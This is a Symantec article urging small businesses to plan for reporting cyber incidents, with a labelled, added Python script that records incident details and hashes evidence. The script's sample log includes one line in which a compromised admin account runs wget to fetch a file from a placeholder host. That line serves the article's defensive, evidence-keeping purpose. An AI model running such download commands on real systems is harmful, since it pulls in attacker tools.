© 1995-2007 Symantec Corporation.
All rights reserved.
Reporting Incidents for Security’s Sake

You and your employees do your best to maintain a secure computing environment in your small business. But sometimes, despite all the security measures in place, networks can fall victim to an Internet attack or intrusion. Most businesses don’t want to think of this possibility, but it is important to have a security incident reporting plan in place – even if it is never exercised – so in those crucial minutes following an incident, you will already know who needs to be informed – and how – both inside and outside your business.

Optimally, you already have an incident response plan, perhaps as part of your comprehensive security policy. Unfortunately, all too many incident handling policies omit this key step in the process.

To report or not? That is the question
Many businesses do not report cybercrime for fear of the negative impact it could have on their business operations or reputation. The two major qualms regarding incident reporting are fear of business disruption and potential for public exposure. Fears that computers will be seized, and that your business will experience major disruption if you report a computer crime, are generally unfounded. Today’s cybercrime investigative services are specially trained in dealing with high-tech crime, and they are very good about keeping business disruption to a minimum. The potential for public exposure is somewhat more complicated. If your cybercrime ends up in court, the incident might well become a matter of public record. Some businesses do not want the fact that they were compromised, or the details of the incident, made public, and this can inhibit their willingness to report.

Before you make up your mind whether or not to add incident reporting to your security policy, you should learn about any laws or statutes that your state, province, and/or country have in place that concern cybercrime, and know the differences between common facts and fallacies regarding reporting.

Realistic statistics
Studies indicate the number of cyberattacks is on the rise; at the same time, those attacks are spreading faster and becoming more severe. The goal of the annual CSI/FBI Computer Crime and Security survey and similar surveys is to gather data on cybercrime in an effort to present an accurate picture of the state of cyberspace. Software vendors, naturally, want to be informed about attacks so they can stay on top of the latest trends in cybercrime. And law enforcement officials want to work with businesses to deter cyber criminals, but cannot do so if they don’t know what’s really happening.

What should you report?
If you experience a cyber attack that results in damage or loss, unauthorized access, or malicious code left behind by the intruder, it should be reported. Authorities should be informed about any significant attacks that caused harm, or could have potentially caused harm. There is no need to inform law enforcement about common events such as routine probes or port scans that you detect, and probably experience every day. These routine events are typically harmless, and occur so frequently and create so much audit data that law enforcement officials typically don’t have the time to analyze it all.

What you can do now
Right now, before an incident has a chance to happen, construct a plan that includes the following:

  • A designated contact person at your business who will handle all incident reports and determine if authorities should be notified.
  • Contact information for the following: vendors you might need to help during a security emergency, ISPs, other relevant technology providers, and any clients or customers that might need to know about an incident immediately.
  • Law enforcement contact information. Determining the correct authorities to whom you should report criminal activity is not always cut and dried. The Department of Justice Computer Crime and Intellectual Property Section has posted some helpful contact information to point you in the right direction.

Collecting facts and evidence
If you have a real-time intrusion detection solution in place, it will automatically alert you once an attack has been detected and proceed to respond to the attack attempts, including preventing further information loss or theft. Be prepared to keep a thorough written record of everything that happened and of your response to the incident. This record-keeping is designed to help preserve the chain of evidence and, ultimately, to help law enforcement help you.

Make sure to document the vitals of the attack, such as:

  • Date and time of the attack.
  • Where the attack occurred and what systems were involved.
  • How the attack was carried out.
  • Whether the hacker used any identifiable tools.
  • What the intruder compromised, and/or what damage was done.

This information will be helpful for authorities to get an overview of the incident. Your initial observations, the log files, and any other evidence should be turned over to the proper authorities when reporting the security breach.
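As an added illustration (not part of the original article), the following Python script assembles the "vitals" listed above into a single incident record and fingerprints each evidence artifact with SHA-256, so that the copy handed to authorities can be checked against the copy you keep. The log lines, host names and contact name are constructed sample values.

```python
import hashlib
import json
from datetime import datetime, timezone

# Constructed sample evidence: a few log lines as they might be captured from an
# affected host. Illustrative values only; the IP address is from a documentation range.
SAMPLE_LOG = (
    b"2007-03-12T02:14:07Z sshd[4121]: Failed password for admin from 198.51.100.7\n"
    b"2007-03-12T02:14:09Z sshd[4121]: Accepted password for admin from 198.51.100.7\n"
    b"2007-03-12T02:15:33Z sudo: admin : COMMAND=/usr/bin/wget http://example.invalid/x\n"
)


def fingerprint(data: bytes) -> str:
    """SHA-256 of an evidence artifact, so later alteration is detectable."""
    return hashlib.sha256(data).hexdigest()


def build_incident_record(when, where, systems, how, tools, impact, evidence, recorder):
    """Assemble the vitals the article lists, plus a manifest of hashed evidence."""
    return {
        "recorded_at": datetime.now(timezone.utc).isoformat(),
        "recorded_by": recorder,           # the designated contact person
        "attack_time": when,               # date and time of the attack
        "location": where,                 # where the attack occurred
        "systems": list(systems),          # systems involved
        "method": how,                     # how the attack was carried out
        "tools_observed": list(tools),     # identifiable tools, if any
        "impact": impact,                  # what was compromised / damage done
        "evidence": [
            {"name": name, "size": len(blob), "sha256": fingerprint(blob)}
            for name, blob in evidence.items()
        ],
    }


def verify_evidence(record, evidence):
    """Recompute hashes before hand-over; returns the names that no longer match."""
    expected = {e["name"]: e["sha256"] for e in record["evidence"]}
    return [n for n, blob in evidence.items() if expected.get(n) != fingerprint(blob)]


if __name__ == "__main__":
    evidence = {"auth.log": SAMPLE_LOG}
    record = build_incident_record(
        "2007-03-12T02:14Z", "branch office", ["fileserver-01"],
        "password guessing against SSH, then tool download", ["wget"],
        "administrative account compromised", evidence, "J. Doe (designated contact)")
    print(json.dumps(record, indent=2))
    print("evidence mismatches:", verify_evidence(record, evidence))
```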

When you have time to review what happened, you should be able to identify ways the attack could have been prevented, and eliminate the chances for such an attack happening again.

Thwarting cybercriminals
By reporting cybercrime, you are actively doing your part (however minor it may seem) to help improve the overall state of Internet security. If businesses small and large take an active role in reporting such attacks, then those who correlate attack numbers and data for research purposes will have much more accurate information to work with. The overall state of cybersecurity will not improve until authorities can gain insight into the real nature and numbers of attacks.

In order to achieve this, the lines of communication between private sector businesses and interested law enforcement parties need to be opened up. Greater security awareness will result, and more reliable statistics can be developed, once private businesses realize the importance of reporting security incidents.
